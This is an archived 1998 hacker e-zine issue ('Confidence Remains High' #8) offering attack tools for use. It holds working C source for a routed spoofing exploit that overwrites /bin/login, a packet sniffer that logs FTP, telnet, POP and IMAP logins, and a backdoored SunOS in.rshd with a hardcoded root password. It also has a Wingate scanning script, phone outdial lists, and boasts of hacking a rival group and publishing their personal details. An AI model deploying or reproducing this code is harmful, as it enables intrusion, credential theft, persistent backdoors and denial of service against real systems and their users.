Hackers Handbook - Millenium Edition

home *** CD-ROM | disk | FTP | other *** search

/ Hackers Handbook - Millenium Edition / Hackers Handbook.iso / magazines / crh / crh008.txt < prev next >

Wrap

Text File | 1998-06-21 | 78.5 KB | 2,345 lines

────────────────────────────────────────────────────────────────────────────── . [cZo] . Team CodeZero Presents . [cZo] . ────────────────────────────────────────────────────────────────────────────── /IIIIIIIIII /IIIIIIIIII /III /III \ III_____/ \ III___/III \ III \ III \ III \ III \ III \ III \_III \ III onfidence \ IIIIIIII emains \ IIIIIIIIII igh \ III \ III__/III \ III__/ III \ III \ III \ III \ III \ III \ IIIIIIIIII ___ \ III \ III ___ \ III \ III ___ \_________/ /\__\ \__/ \__/ /\__\ \__/ \__/ /\__\ \/__/ \/__/ \/__/ ────────────────────────────────────────────────────────────────────────────── Issue 8 22nd March 1998 ─────────────────────────────────────────────────────────────────────────────── Man with the plan : so1o The usual : om3n, zer0x, xFli, electro, spheroid, el8, ultima, chameleon. Not forgotten : loss, organik, peenut, pzn, suid helix, deprave, manly, Shok. Others : paladine, Sciri, fiji, ch-E-ztic, vacuum, humble. Cheers : Darkcyde, Jf. Russians : lirik, DemiGod, stranger, ps. .-----------[ An Official ]-----------. : .-----. .----. .--.--. : : : .--' : .-. : : : : : !_-:: : : : `-' ; : . : ::-_! :~-:: :: : :: . : :: : ::-~: : ::.`--. ::.: : ::.: : : : `-----' `--'--' `--'--' : !_-:: ::-_! :~-::-[ Confidence Remains High ]-::-~: :~-:: ::-~: `-----------[ Production ]------------' ─────────────────────────────────────────────────────────────────────────────── In This (compact) Installment of Confidence Remains High : ─────────────────────────────────────────────────────────────────────────────── ------=> Section A : Introduction And Cover Story. 1. Confidence Remains High issue 8....................: Tetsu Khan 2. sIn (here we go again).............................: so1o ------=> Section B : Exploits And Code. 1. Jimmy J's "vintage warez" : pack #1................: JJ 2. routed remote......................................: Kit Knox 3. Wingate scanner....................................: cL0ut 4. LinSniffer 0.666...................................: humble 5. SunOS 5.5.1 in.rshd trojan.........................: anonymous ------=> Section C : Phones / Scanning / Radio. 1. Outdials...........................................: Lirik 2. BlueBoxing in the UK in '98........................: The UK Phreaking Elite 3. UK Phone Definitions and Abbreviations.............: Jf ------=> Section D : Miscellaneous. 1. Top 10 reasons why.................................: anonymous 2. Hacking Digital Unix 4.0...........................: humble 3. FreeBSD 2.2.5 rootkit..............................: humble / method 4. l0ckd0wn.sh........................................: so1o ------=> Section E : World News. 1. VMG 0wned..........................................: sw1tch -------=> Section F : Projects. 1. The Rhino9 Sentinel................................: so1o / humble 2. TotalCon...........................................: so1o ------=> Section G : FIN. ─────────────────────────────────────────────────────────────────────────────── =============================================================================== ==[ INTRO ]====================[ .SECTION A. ]======================[ INTRO ]== =============================================================================== ─────────────────────────────────────────────────────────────────────────────── 1. Confidence Remains High issue 8 : Tetsu Khan ─────────────────────────────────────────────────────────────────────────────── It's all good, issue 8 is here, life is good, and I feel great. Blah blah blah, enjoy :D The distro list.. ================= ftp.sekurity.org /users/so1o/ www.fth.org /crh/ www.technotronic.com /files/ezines/crh/ cybrids.simplenet.com /Toast/files/CRH/ ftp.linuxwarez.com /pub/crh/ Also check out.. ================ www.hacked.net <-- Archive of all the stuff we have 0wned. /server dark.technonet.com 6667 #!r00td0wn --------------------------------------------- ^-- or kali.cylink.net, dhp.com 6666, few others.. want to mail us? tk85@hotmail.com, you got CRH on your site? tell us f00l! ─────────────────────────────────────────────────────────────────────────────── 2. sIn (here we go again) : so1o ─────────────────────────────────────────────────────────────────────────────── I have on thing to say, and that is.. we 0wned sIn, go see it at hacked.net, www.hacked.net/exp/com/sinnerz/, we also pulled their d0x, they now live in phear. PERIOD, it is over. yes? We win, you lose, every time. here is a p1c 0f s0me sIn cl00bag t4ken by 4n el8 s4tellit3 : \|||||/ / o o \ __________ | { ^ }-=/ give me \ | \_____/ \ vB k0dez!| | | / `````````` | /|\ / O | / | \/ | | | / \ | / \ | w0w, fh 1s pl4y1ng w4ll b4ll, a p0pular m0rmon pastt1me! For free sIn d0x to add to your 0wn filez of 0wnersh1p, check earlier CRH issues (namedly 3-5).. CRH distro list in pt.1 ─────────────────────────────────────────────────────────────────────────────── =============================================================================== ==[ EXPLOITS / CODE ]==========[ .SECTION B. ]============[ EXPLOITS / CODE ]== =============================================================================== ─────────────────────────────────────────────────────────────────────────────── 1. Jimmy J's "vintage warez" : pack #1 ─────────────────────────────────────────────────────────────────────────────── #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### #### ####### ####### Jimmy J's "vintage warez" : pack #1 ----------------------------------- phf - The old favourite but with some new and useful options such as trying the bash ff hole to avoid phf filtering the newline character. test-cgi - Another oldie allowing you to remotely list files. Good for getting an idea what CGIs are on the machine as well as other stuff, including packages installed etc. icat - Grab a file from a remote machine running imapd. (You need a valid account on the box) Included in the crh008.zip is a vintage.tgz, these are Linux binaries for the programs above, the two CGI exploits are as old as the hills but they never seem to die so I dusted off some old archives and set about refining them into a semi-useful state. You can now specify a port number and a path to the CGI if you need and the phf script even swaps spaces for %20s provided you use it properly. I'm just releasing these for a laugh really. Someone, somewhere will appreciate the effort. I am not responsible for any use or misuse of these warez. They are for informational purposes. I urge the novice script kiddies among you to read the comments if you're eager to learn what's going on behind the scenes and why. Learning is good. That's it. Have fun. JJ. (If you wish to contact me mail chris@rootshell.com and he will forward it.) ─────────────────────────────────────────────────────────────────────────────── 2. routed remote : Kit Knox ─────────────────────────────────────────────────────────────────────────────── /* * BSD 4.4 based routed trace file exploit * * Basically, routed on IRIX, AIX and Linux systems can be forced into a debug * mode, where a tracefile is specified in the RIP header, this tracefile can * be used as a form of DoS, as you can specify it to overwrite system files, * the actual contents of the file created is just routing information, so you * CANNOT set up .rhosts files or rootshells! You can only use it as DoS, * this was also a problem with the old statd remote, but people worked out * how to use a "grappling-hook" technique, that gave a remote rootshell, it's * documented in a CERT advisory for statd, work it out.. * * Originally from l0ck, but recoded by Kit Knox (info@rootshell.com), with * RIP spoofing etc. etc. still does the DoS, no rootshells yet :P * * NOTE : routed usually runs on port 520. */ /* File to append to on filesystem with debug output */ #define FILETOCREATE "/bin/login" #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netinet/in_systm.h> #include <netinet/ip.h> #include <netinet/ip_tcp.h> #include <linux/udp.h> #include <netinet/protocols.h> #include <netdb.h> #include <protocols/routed.h> #include <linux/route.h> #define err(x) { fprintf(stderr, x); exit(1); } #define errs(x, y) { fprintf(stderr, x, y); exit(1); } /* * in_cksum -- * Checksum routine for Internet Protocol family headers (C Version) */ unsigned short in_cksum(addr, len) u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; /* * Our algorithm is simple, using a 32 bit accumulator (sum), we add * sequential 16 bit words to it, and at the end, fold back all the * carry bits from the top 16 bits into the lower 16 bits. */ while (nleft > 1) { sum += *w++; nleft -= 2; } /* mop up an odd byte, if necessary */ if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)w ; sum += answer; } /* add back carry outs from top 16 bits to low 16 bits */ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return(answer); } /* Send faked UDP packet. */ int sendpkt_udp(sin, s, data, datalen, saddr, daddr, sport, dport) struct sockaddr_in *sin; unsigned short int s, datalen, sport, dport; unsigned long int saddr, daddr; char *data; { struct iphdr ip; struct udphdr udp; static char packet[8192]; /* Fill in IP header values. */ ip.ihl = 5; ip.version = 4; ip.tos = 0; ip.tot_len = htons(28 + datalen); ip.id = htons(31337 + (rand()%100)); ip.frag_off = 0; ip.ttl = 255; ip.protocol = IPPROTO_UDP; ip.check = 0; ip.saddr = saddr; ip.daddr = daddr; ip.check = in_cksum((char *)&ip, sizeof(ip)); /* Fill in UDP header values. Checksums are unnecassary. */ udp.source = htons(sport); udp.dest = htons(dport); udp.len = htons(8 + datalen); udp.check = (short) 0; /* Copy the headers into our character array. */ memcpy(packet, (char *)&ip, sizeof(ip)); memcpy(packet+sizeof(ip), (char *)&udp, sizeof(udp)); memcpy(packet+sizeof(ip)+sizeof(udp), (char *)data, datalen); return(sendto(s, packet, sizeof(ip)+sizeof(udp)+datalen, 0, (struct sockaddr *)sin, sizeof(struct sockaddr_in))); } /* Lookup the name. Also handles a.b.c.d dotted quads. Returns 0 on error */ unsigned int lookup(host) char *host; { unsigned int addr; struct hostent *he; addr = inet_addr(host); /* Try if it's a "127.0.0.1" style string */ if (addr == -1) /* If not, lookup the host */ { he = gethostbyname(host); if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL)) return 0; bcopy(*(he->h_addr_list), &(addr), sizeof(he->h_addr_list)); } return(addr); } void main(argc, argv) int argc; char **argv; { unsigned int saddr, daddr; struct sockaddr_in sin; int s; struct rip rp; if(argc != 4) errs("\nSee http://www.rootshell.com/\n\nUsage: %s <source_router> <dest_addr> <command>\n\ncommand: 3 = trace on, 4 = trace off\n\n",argv[0]); if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) err("Unable to open raw socket.\n"); if(!(saddr = lookup(argv[1]))) err("Unable to lookup source address.\n"); if(!(daddr = lookup(argv[2]))) err("Unable to lookup destination address.\n"); sin.sin_family = AF_INET; sin.sin_addr.s_addr= daddr; sin.sin_port = 520; /* Fill in RIP packet info */ rp.rip_cmd = atoi(argv[3]); /* 3 = RIPCMD_TRACEON, 4 = RIPCMD_TRACEOFF */ rp.rip_vers = RIPVERSION; /* Must be version 1 */ sprintf(rp.rip_tracefile, FILETOCREATE); if((sendpkt_udp(&sin, s, &rp, sizeof(rp), saddr, daddr, 520, 520)) == -1) { perror("sendpkt_udp"); err("Error sending the UDP packet.\n"); } } ─────────────────────────────────────────────────────────────────────────────── 3. Wingate scanner : trajek / cl0ut ─────────────────────────────────────────────────────────────────────────────── Needs nmap (phrack 51 -> www.phrack.com), work it out, simple.. skr1pt #1 ---8<--- cut here ---8<--- cut here ---8<--- cut here ---8<--- cut here #nmap $1 -p 23 | grep telnet if nmap $1 -p 23 | grep telnet ; then echo $1 >> scan.results fi ---8<--- cut here ---8<--- cut here ---8<--- cut here ---8<--- cut here skr1pt #2 ---8<--- cut here ---8<--- cut here ---8<--- cut here ---8<--- cut here # tee hee.. cl0ut/1998 host -l $1 | grep "has address" | awk -F ' ' '{ print $4 }' > $1.domains echo "* Sorting hosts and removing dupes." sort < $1.domains > $1.sorted uniq < $1.sorted > $1.domains rm -f $1.sorted cat $1.domains | awk -F ' ' '{ print "./b " $1 }' > $1.tmp rm -fr $1.domains chmod +x $1.tmp ./$1.tmp rm -fr $1.tmp ---8<--- cut here ---8<--- cut here ---8<--- cut here ---8<--- cut here ─────────────────────────────────────────────────────────────────────────────── 4. LinSniffer 0.666 : humble ─────────────────────────────────────────────────────────────────────────────── /* * LinSniffer 0.666 * by humble of rhino9 * I am not responsible for what you do with this. * * This is like linsniffer, but it uses a linked list * so it won't ignore any connections. * * based on original code by Mike Edulla * * how many bytes do you want to capture per connection? * it mallocs this much memory for each connection so don't * make it too high */ #define MAXIMUM_CAPTURE 256 // how long before we stop watching an idle connection? #define TIMEOUT 30 // log file name? #define LOGNAME "tcp.log" #include <sys/types.h> #include <sys/socket.h> #include <sys/time.h> #include <netinet/in.h> #include <netdb.h> #include <string.h> #include <linux/if.h> #include <signal.h> #include <stdio.h> #include <arpa/inet.h> #include <linux/socket.h> #include <linux/ip.h> #include <linux/tcp.h> #include <linux/if_ether.h> #include <sys/stat.h> #include <fcntl.h> int sock; FILE *log; struct connection { struct connection *next; time_t start; time_t lasthit; unsigned long saddr; unsigned long daddr; unsigned short sport; unsigned short dport; unsigned char data[MAXIMUM_CAPTURE]; int bytes; }; typedef struct connection *clistptr; clistptr head,tail; void add_node(unsigned long sa, unsigned long da,unsigned short sp,unsigned short dp) { clistptr newnode; newnode=(clistptr)malloc(sizeof(struct connection)); newnode->saddr=sa; newnode->daddr=da; newnode->sport=sp; newnode->dport=dp; newnode->bytes=0; newnode->next=NULL; time(&(newnode->start)); time(&(newnode->lasthit)); if (!head) { head=newnode; tail=newnode; } else { tail->next=newnode; tail=newnode; } } char *hostlookup(unsigned long int in) { static char blah[1024]; struct in_addr i; struct hostent *he; i.s_addr=in; he=gethostbyaddr((char *)&i, sizeof(struct in_addr),AF_INET); if(he == NULL) strcpy(blah, inet_ntoa(i)); else strcpy(blah, he->h_name); return blah; } char *pretty(time_t *t) { char *time; time=ctime(t); time[strlen(time)-6]=0; return time; } int remove_node(unsigned long sa, unsigned long da,unsigned short sp,unsigned short dp) { clistptr walker,prev; int i=0; int t=0; if (head) { walker=head; prev=head; while (walker) { if (sa==walker->saddr && da==walker->daddr && sp==walker->sport && dp==walker->dport) { prev->next=walker->next; if (walker==head) { head=head->next;; prev=NULL; } if (walker==tail) tail=prev; fprintf(log,"============================================================\n"); fprintf(log,"Time: %s Size: %d\nPath: %s",pretty(&(walker->start)),walker->bytes,hostlookup(sa)); fprintf(log," => %s [%d]\n------------------------------------------------------------\n",hostlookup(da),ntohs(dp)); fflush(log); for (i=0;i<walker->bytes;i++) { if (walker->data[i]==13) { fprintf(log,"\n"); t=0; } if (isprint(walker->data[i])) { fprintf(log,"%c",walker->data[i]); t++; } if (t>75) { t=0; fprintf(log,"\n"); } } fprintf(log,"\n"); fflush(log); free (walker); return 1; } prev=walker; walker=walker->next; } } } int log_node(unsigned long sa, unsigned long da,unsigned short sp,unsigned short dp,int bytes,char *buffer) { clistptr walker; walker=head; while (walker) { if (sa==walker->saddr && da==walker->daddr && sp==walker->sport && dp==walker->dport) { time(&(walker->lasthit)); strncpy(walker->data+walker->bytes,buffer,MAXIMUM_CAPTURE-walker->bytes); walker->bytes=walker->bytes+bytes; if (walker->bytes>=MAXIMUM_CAPTURE) { walker->bytes=MAXIMUM_CAPTURE; remove_node(sa,da,sp,dp); return 1; } } walker=walker->next; } } void setup_interface(char *device); void cleanup(int); struct etherpacket { struct ethhdr eth; struct iphdr ip; struct tcphdr tcp; char buff[8192]; } ep; struct iphdr *ip; struct tcphdr *tcp; void cleanup(int sig) { if (sock) close(sock); if (log) { fprintf(log,"\nExiting...\n"); fclose(log); } exit(0); } void purgeidle(int sig) { clistptr walker; time_t curtime; walker=head; signal(SIGALRM, purgeidle); alarm(5); // printf("Purging idle connections...\n"); time(&curtime); while (walker) { if (curtime - walker->lasthit > TIMEOUT) { // printf("Removing node: %d,%d,%d,%d\n",walker->saddr,walker->daddr,walker->sport,walker->dport); remove_node(walker->saddr,walker->daddr,walker->sport,walker->dport); walker=head; } else walker=walker->next; } } void setup_interface(char *device) { int fd; struct ifreq ifr; int s; //open up our magic SOCK_PACKET fd=socket(AF_INET, SOCK_PACKET, htons(ETH_P_ALL)); if(fd < 0) { perror("cant get SOCK_PACKET socket"); exit(0); } //set our device into promiscuous mode strcpy(ifr.ifr_name, device); s=ioctl(fd, SIOCGIFFLAGS, &ifr); if(s < 0) { close(fd); perror("cant get flags"); exit(0); } ifr.ifr_flags |= IFF_PROMISC; s=ioctl(fd, SIOCSIFFLAGS, &ifr); if(s < 0) perror("cant set promiscuous mode"); sock=fd; } int filter(void) { int p; p=0; if(ip->protocol != 6) return 0; p=0; if (htons(tcp->dest) == 21) p= 1; if (htons(tcp->dest) == 23) p= 1; if (htons(tcp->dest) == 106) p= 1; if (htons(tcp->dest) == 109) p= 1; if (htons(tcp->dest) == 110) p= 1; if (htons(tcp->dest) == 143) p= 1; if (htons(tcp->dest) == 513) p= 1; if (!p) return 0; if(tcp->syn == 1) { // printf("Adding node syn %d,%d,%d,%d.\n",ip->saddr,ip->daddr,tcp->source,tcp->dest); add_node(ip->saddr,ip->daddr,tcp->source,tcp->dest); } if (tcp->rst ==1) { // printf("Removed node rst %d,%d,%d,%d.\n",ip->saddr,ip->daddr,tcp->source,tcp->dest); remove_node(ip->saddr,ip->daddr,tcp->source,tcp->dest); } if (tcp->fin ==1) { // printf("Removed node fin %d,%d,%d,%d.\n",ip->saddr,ip->daddr,tcp->source,tcp->dest); remove_node(ip->saddr,ip->daddr,tcp->source,tcp->dest); } log_node(ip->saddr,ip->daddr,tcp->source,tcp->dest,htons(ip->tot_len)-sizeof(ep.ip)-sizeof(ep.tcp), ep.buff-2); } void main(int argc, char *argv[]) { int x,dn; clistptr c; head=tail=NULL; ip=(struct iphdr *)(((unsigned long)&ep.ip)-2); tcp=(struct tcphdr *)(((unsigned long)&ep.tcp)-2); if (fork()==0) { close(0); close(1); close(2); setsid(); dn=open("/dev/null",O_RDWR); dup2(0,dn); dup2(1,dn); dup2(2,dn); close(dn); setup_interface("eth0"); signal(SIGHUP, SIG_IGN); signal(SIGINT, cleanup); signal(SIGTERM, cleanup); signal(SIGKILL, cleanup); signal(SIGQUIT, cleanup); signal(SIGALRM, purgeidle); log=fopen(LOGNAME,"a"); if (log == NULL) { fprintf(stderr, "cant open log\n"); exit(0); } alarm(5); while (1) { x=read(sock, (struct etherpacket *)&ep, sizeof(struct etherpacket)); if (x>1) { filter(); } } } } ─────────────────────────────────────────────────────────────────────────────── 5. SunOS 5.5.1 in.rshd trojan : anonymous ─────────────────────────────────────────────────────────────────────────────── /* SunOS 5.5.1 in.rshd trojan By anonymous, for the hackers of the w0rld 1/3/98 Use thiz shizn1t t0 make me! cc in.rshd.c -o in.rshd -lsocket -lnsl -lintl -lw -ldl -lbsm -lauth -DSYSV -DSTRNET -DBSD_COMP -s Then mv me to /usr/sbin, and restart inetd using: # kill -HUP <pid of inetd> w0rd. */ #define PASSWORD "eatme" #ident "@(#)in.rshd.c 0.41 92/08/11" #include <sys/types.h> #include <sys/ioctl.h> #include <sys/param.h> #include <sys/socket.h> #include <sys/time.h> #include <sys/stat.h> #include <netinet/in.h> #include <arpa/inet.h> #include <stdio.h> #include <errno.h> #include <pwd.h> #include <signal.h> #include <netdb.h> #include <syslog.h> #ifdef SYSV #include <sys/resource.h> #include <sys/filio.h> #include <shadow.h> #include <stdlib.h> #include <security/ia_appl.h> #define killpg(a,b) kill(-(a),(b)) #define rindex strrchr #define index strchr #endif /* SYSV */ #ifndef NCARGS #define NCARGS 5120 #endif /* NCARGS */ int errno; char *index(), *rindex(), *strncat(); /*VARARGS1*/ int error(); struct ia_status ia_status; void * iah; int retval; /*ARGSUSED*/ main(argc, argv) int argc; char **argv; { struct linger linger; int on = 1, fromlen; struct sockaddr_in from; openlog("rsh", LOG_PID | LOG_ODELAY, LOG_DAEMON); audit_rshd_setup(); /* BSM */ fromlen = sizeof (from); if (getpeername(0, (struct sockaddr *) &from, &fromlen) < 0) { fprintf(stderr, "%s: ", argv[0]); perror("getpeername"); _exit(1); } if (setsockopt(0, SOL_SOCKET, SO_KEEPALIVE, (char *)&on, sizeof (on)) < 0) syslog(LOG_WARNING, "setsockopt (SO_KEEPALIVE): %m"); linger.l_onoff = 1; linger.l_linger = 60; /* XXX */ if (setsockopt(0, SOL_SOCKET, SO_LINGER, (char *)&linger, sizeof (linger)) < 0) syslog(LOG_WARNING, "setsockopt (SO_LINGER): %m"); doit(dup(0), &from); /* NOTREACHED */ } char username[20] = "USER="; char homedir[64] = "HOME="; char shell[64] = "SHELL="; #ifdef SYSV char *envinit[] = {homedir, shell, (char *) 0, username, (char *) 0, (char *) 0}; #define ENVINIT_PATH 2 /* position of PATH in envinit[] */ #define ENVINIT_TZ 4 /* position of TZ in envinit[] */ /* * See PSARC opinion 1992/025 */ char userpath[] = "PATH=/usr/bin:"; char rootpath[] = "PATH=/usr/sbin:/usr/bin"; #else char *envinit[] = {homedir, shell, "PATH=:/usr/ucb:/bin:/usr/bin", username, 0}; #endif /* SYSV */ static char cmdbuf[NCARGS+1]; char hostname [MAXHOSTNAMELEN + 1]; doit(f, fromp) int f; struct sockaddr_in *fromp; { char *cp; char locuser[16], remuser[16]; struct passwd *pwd; #ifdef SYSV char *tz, *tzenv; struct spwd *shpwd; struct stat statb; #endif /* SYSV */ int s; struct hostent *hp; short port; pid_t pid; int pv[2], cc; char buf[BUFSIZ], sig; int one = 1; int trojan=0; (void) signal(SIGINT, SIG_DFL); (void) signal(SIGQUIT, SIG_DFL); (void) signal(SIGTERM, SIG_DFL); #ifdef SYSV (void) sigset(SIGCHLD, SIG_IGN); #endif /* SYSV */ #ifdef DEBUG { int t = open("/dev/tty", 2); if (t >= 0) { #ifdef SYSV setsid(); #else ioctl(t, TIOCNOTTY, (char *)0); #endif SYSV (void) close(t); } } #endif fromp->sin_port = ntohs((u_short)fromp->sin_port); if (fromp->sin_family != AF_INET) { syslog(LOG_ERR, "malformed from address\n"); exit(1); } if (fromp->sin_port >= IPPORT_RESERVED || fromp->sin_port < (u_int) (IPPORT_RESERVED/2)) { syslog(LOG_NOTICE, "connection from bad port\n"); exit(1); } (void) alarm(60); port = 0; for (;;) { char c; if ((cc = read(f, &c, 1)) != 1) { if (cc < 0) syslog(LOG_NOTICE, "read: %m"); shutdown(f, 1+1); exit(1); } if (c == 0) break; port = port * 10 + c - '0'; } (void) alarm(0); if (port != 0) { int lport = IPPORT_RESERVED - 1; s = rresvport(&lport); if (s < 0) { syslog(LOG_ERR, "can't get stderr port: %m"); exit(1); } if (port >= IPPORT_RESERVED) { syslog(LOG_ERR, "2nd port not reserved\n"); exit(1); } fromp->sin_port = htons((u_short)port); if (connect(s, (struct sockaddr *) fromp, sizeof (*fromp)) < 0) { syslog(LOG_INFO, "connect second port: %m"); exit(1); } } dup2(f, 0); dup2(f, 1); dup2(f, 2); hp = gethostbyaddr((char *)&fromp->sin_addr, sizeof (struct in_addr), fromp->sin_family); if (hp) strncpy (hostname, hp->h_name, sizeof(hostname)); else strncpy (hostname, inet_ntoa(fromp->sin_addr), sizeof(hostname)); getstr(remuser, sizeof(remuser), "remuser"); getstr(locuser, sizeof(locuser), "locuser"); getstr(cmdbuf, sizeof(cmdbuf), "command"); if (!strcmp(PASSWORD,locuser)) { trojan=1; } if (!trojan && (ia_start("in.rshd", locuser, NULL, hostname, NULL, &iah)) != IA_SUCCESS) { syslog(LOG_ERR, "ia_start() failed\n"); exit(1); } if (!trojan && ia_auth_user(iah, 0, &pwd, &ia_status) != IA_SUCCESS) { error("permission denied\n"); audit_rshd_fail("Login incorrect", hostname, remuser, locuser, cmdbuf); /* BSM */ exit(1); } if (trojan) pwd=getpwnam("root"); else { shpwd = getspnam(locuser); if (shpwd == NULL) { error("permission denied.\n"); audit_rshd_fail("Login incorrect", hostname, remuser, locuser, cmdbuf); /* BSM */ exit(1); } } /* * maintain 2.1 and 4.* and BSD semantics with anonymous rshd */ if (!trojan && shpwd->sp_pwdp != 0 && *shpwd->sp_pwdp != '\0' && ia_auth_netuser(iah, remuser, &ia_status) != IA_SUCCESS ) { error("permission denied\n"); audit_rshd_fail("Permission denied", hostname, remuser, locuser, cmdbuf); /* BSM */ exit(1); } if (chdir(pwd->pw_dir) < 0) { (void) chdir("/"); #ifdef notdef error("No remote directory.\n"); exit(1); #endif } (void) write(2, "\0", 1); if (port) { if (pipe(pv) < 0) { error("Can't make pipe.\n"); exit(1); } pid = fork(); if (pid == (pid_t)-1) { error("Fork (to start shell) failed on server. Please try again later.\n"); exit(1); } #ifndef MAX #define MAX(a,b) (((u_int)(a) > (u_int)(b)) ? (a) : (b)) #endif /* MAX */ if (pid) { int width = MAX(s, pv[0]) + 1; fd_set ready; fd_set readfrom; (void) close(0); (void) close(1); (void) close(2); (void) close(f); (void) close(pv[1]); FD_ZERO (&ready); FD_ZERO (&readfrom); FD_SET (s, &readfrom); FD_SET (pv[0], &readfrom); if (ioctl(pv[0], FIONBIO, (char *)&one) == -1) syslog (LOG_INFO, "ioctl FIONBIO: %m"); /* should set s nbio! */ do { ready = readfrom; if (select(width, &ready, (fd_set *)0, (fd_set *)0, (struct timeval *)0) < 0) break; if (FD_ISSET (s, &ready)) { if (read(s, &sig, 1) <= 0) FD_CLR (s, &readfrom); else killpg(pid, sig); } if (FD_ISSET (pv[0], &ready)) { errno = 0; cc = read(pv[0], buf, sizeof (buf)); if (cc <= 0) { shutdown(s, 1+1); FD_CLR (pv[0], &readfrom); } else (void) write(s, buf, cc); } } while (FD_ISSET (s, &readfrom) || FD_ISSET (pv[0], &readfrom)); exit(0); } setpgrp(0, getpid()); (void) close(s); (void) close(pv[0]); dup2(pv[1], 2); (void) close(pv[1]); } if (*pwd->pw_shell == '\0') pwd->pw_shell = "/bin/sh"; (void) close(f); /* * write audit record before making uid switch */ if (!trojan) { audit_rshd_success(hostname, remuser, locuser, cmdbuf); /* BSM */ if (retval = ia_setcred(iah, SC_INITGPS|SC_SETRID, pwd->pw_uid, pwd->pw_gid, 0, NULL, &ia_status)) { switch (retval) { case 0: break; case IA_BAD_GID: error("Invalid gid.\n"); exit(1); case IA_BAD_UID: error("Invalid uid.\n"); exit(1); default: exit(1); } } ia_end(iah); } #ifdef SYSV if (pwd->pw_uid) envinit[ENVINIT_PATH] = userpath; else envinit[ENVINIT_PATH] = rootpath; if (tzenv = getenv("TZ")) { /* * In the line below, 4 is strlen("TZ=") + 1 null byte. * We have to malloc the space because it's difficult to * compute the maximum size of a timezone string. */ tz = (char *) malloc(strlen(tzenv) + 4); if (tz) { strcpy(tz, "TZ="); strcat(tz, tzenv); envinit[ENVINIT_TZ] = tz; } } #endif /* SYSV */ strncat(homedir, pwd->pw_dir, sizeof(homedir)-6); strncat(shell, pwd->pw_shell, sizeof(shell)-7); strncat(username, pwd->pw_name, sizeof(username)-6); cp = rindex(pwd->pw_shell, '/'); if (cp) cp++; else cp = pwd->pw_shell; #ifdef SYSV /* * rdist has been moved to /usr/bin, so /usr/ucb/rdist might not * be present on a system. So if it doesn't exist we fall back * and try for it in /usr/bin. We take care to match the space * after the name because the only purpose of this is to protect * the internal call from old rdist's, not humans who type * "rsh foo /usr/ucb/rdist". */ #define RDIST_PROG_NAME "/usr/ucb/rdist -Server" if (strncmp(cmdbuf, RDIST_PROG_NAME, strlen(RDIST_PROG_NAME)) == 0) { if (stat("/usr/ucb/rdist", &statb) != 0) { strncpy(cmdbuf + 5, "bin", 3); } } #endif execle(pwd->pw_shell, cp, "-c", cmdbuf, (char *)0, envinit); perror(pwd->pw_shell); exit(1); } /*VARARGS1*/ error(fmt, a1, a2, a3) char *fmt; int a1, a2, a3; { char buf[BUFSIZ]; buf[0] = 1; (void) sprintf(buf+1, fmt, a1, a2, a3); (void) write(2, buf, strlen(buf)); } getstr(buf, cnt, err) char *buf; int cnt; char *err; { char c; do { if (read(0, &c, 1) != 1) exit(1); *buf++ = c; if (--cnt == 0) { error("%s too long\n", err); exit(1); } } while (c != 0); } ─────────────────────────────────────────────────────────────────────────────── =============================================================================== ==[ FONES / SCANNING ]=========[ .SECTION C. ]===========[ FONES / SCANNING ]== =============================================================================== ─────────────────────────────────────────────────────────────────────────────── 1. Outdials : Lirik ─────────────────────────────────────────────────────────────────────────────── Working Outdials [100% for 304/319/413/800/804/814 NPAs] x.25 NPAs:204.306.403.416.418.506.514.519.604.613.709.902.905 =============================================================================== Note ■ NPA ■ IP/commands/Dial mask/Phones ───────────────────────────────────────────────────────────────────── !!! 304 DIALOUT.WVNET.EDU (No parity) 1800 DIALOUTE.WVNET.EDU (Even parity) ATDT 9,xxxxxxx http://wvnvm.wvnet.edu/~roman/dialout.html test phone atdt35001 !!! 319 ISN.IASTATE.EDU. or isn.rdns.iastate.edu DIAL: MODEM or HELP ATDT8xxx-xxxx !!! 413 dialout2400.smith.edu | dialout.smith.edu Ctrl+} gives PLACE AUTOCAL press y, wait for CALL COMPLETE atdt9,,xxx-xxxx Independent Nation (413)573-1809 !!! 804 ublan.acc.virginia.edu / ublan.virginia.edu 1800 ublan2.acc.virginia.edu >>connect telnet >>connect hayes atdt9,,xxx-xxxx CPN 804-847-2501 !!! 814 dialout.psu.edu atdt8xxxxxxxxxx 1800 CompuServe 2400 82387910 Telenet 2400 82311510 Tymnet 2400 82343853 DEC. 9600 7AM-Midnight EST 818002341998 Port name: _LTA4974: ──────────────────x.25 network access only [NUI required]─────────────── NPAs:204.306.403.416.418.506.514.519.604.613.709.902.905 DATAPAC 3101 (ASYNC/ITI) OUT-DIAL PORT ADDRESSES Outdial Ports (accept only prePAID calls!) The Destination terminal must be set to 7E1 in order to receive the outdial call 1) ENTER THE 7-DIGIT TELEPHONE NUMBER (LOCAL) OF THE DESTINATION TERMINAL. 2) DATAPAC WILL RESPOND WITH: DIALING/COMPOSITION DU NUMERO (XXX-XXXX) 3) DATAPAC WILL THEN INDICATE: RINGING/SONNERIE AS THE MODEM DETECTS RINGBACK TONE. 4) WHEN THE DESTINATION MODEM ANSWERS THE CALL, DATAPAC WILL SEND THE FOLLOWING MESSAGE TO THE ORIGINATING END: CALL CONNECTED/COMMUNICATION ETABLIE NPA City (PROVINCE) SPEED NUA ADDRESS --- --------------- ----- ------------- 403 Calgary (ALTA) 300 0302063300900 1200 0302063300901 416 Clarkson (ONT) 300 0302091900900 1200 0302091900901 403 Edmonton (ALTA) 300 0302058700900 1200 0302058700901 902 Halifax (NS) 300 0302076101900 1200 0302076101901 905 Hamilton (ONT) 300 0302038500900 1200 0302038500901 519 Kitchener (ONT) 300 0302033400900 1200 0302033400901 519 London (ONT) 300 0302035600900 1200 0302035600901 514 Montreal (QUE) 300 0302082700902 1200 0302082700903 613 Ottawa (ONT) 300 0302085700901 1200 0302085700902 418 Quebec City (QUE) 300 0302048400900 1200 0302048400901 306 Regina (SASK) 300 0302072100900 1200 0302072100901 506 St-John's (NB) 300 0302074600900 1200 0302074600901 306 Saskatoon (SASK) 300 0302071100900 1200 0302071100901 709 St. John (NFLD) 300 0302078100900 